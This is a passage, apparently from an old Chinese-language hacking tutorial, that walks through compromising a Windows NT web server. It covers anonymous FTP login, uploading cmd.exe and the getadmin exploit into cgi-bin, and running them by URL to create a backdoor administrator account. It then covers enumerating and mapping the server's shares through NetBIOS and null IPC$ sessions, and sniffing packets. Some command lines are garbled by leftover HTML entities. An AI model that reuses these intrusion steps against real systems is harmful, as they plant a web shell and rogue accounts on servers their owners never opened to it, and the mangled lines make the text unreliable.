ftp www.xxx.com connected to www.xxx.com |
user (www.xxx.comnone)):anonymous password: 输入 guest@ 或者guest |
在这种情况下我们就可以进nt server的ftp了。
进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
现在,开始查找cgi-bin目录(或者scripts目录)。进去以后,把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin。
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn
大约十多秒后屏幕显示:
cgi error |
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add |
http://www.xxx.com/cgi-bin/getadmin.exe?china |
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china |
之三:
用nt的netbios技术扫描
nbtstat -a http://www.xxx.com/ |
或者,
nbtstat -a http://www.xxx.com/ |
这样可以得到其域的共享资源名称;
net view file:/www.xxx.com/ |
可以获得其机器的共享资源名称,如果有c盘,
net use f: file:/www.xxx.com/c |
可以用f:映射其c盘,
net use $">\\111.111.111.111\ipc$content$nbsp;"quot;"quot; /user:"quot;"quot; |
windows95和98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:windump95.exe 使用前还要下载这个库 packet95.exe。
windowsnt用户的版本,windump.exe packetnt.exe